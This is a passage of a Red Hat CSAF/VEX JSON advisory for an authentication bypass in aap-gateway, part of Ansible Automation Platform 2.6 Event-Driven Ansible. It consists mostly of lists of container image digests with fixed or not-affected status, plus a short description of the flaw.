"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2508155"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in aap-gateway, a component of Ansible Automation Platform\u0027s Event-Driven Ansible (EDA). An unauthenticated remote attacker can bypass mutual Transport Layer Security (mTLS) authentication for event streams. This is achieved by manipulating the event stream URL and forging the HTTP Subject header. The system also inadvertently discloses the expected certificate subject in error messages, which simplifies the attack. This vulnerability allows an attacker to inject arbitrary events into EDA, potentially triggering automated workflows.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "aap-gateway: aap-gateway: Authentication bypass in Event-Driven Ansible via forged HTTP header",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Important: Ansible Automation Platform 2.6 Event-Driven Ansible (EDA) is vulnerable to an authentication bypass, allowing unauthenticated remote attackers to inject arbitrary events into mTLS-protected event streams. This is due to a flaw in the `aap-gateway` configuration that permits bypassing mTLS by manipulating the URL and forging the Subject HTTP header. The vulnerability is exacerbated by information disclosure, where error messages reveal the expected certificate subject, simplifying targeted exploitation against default mTLS deployments.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
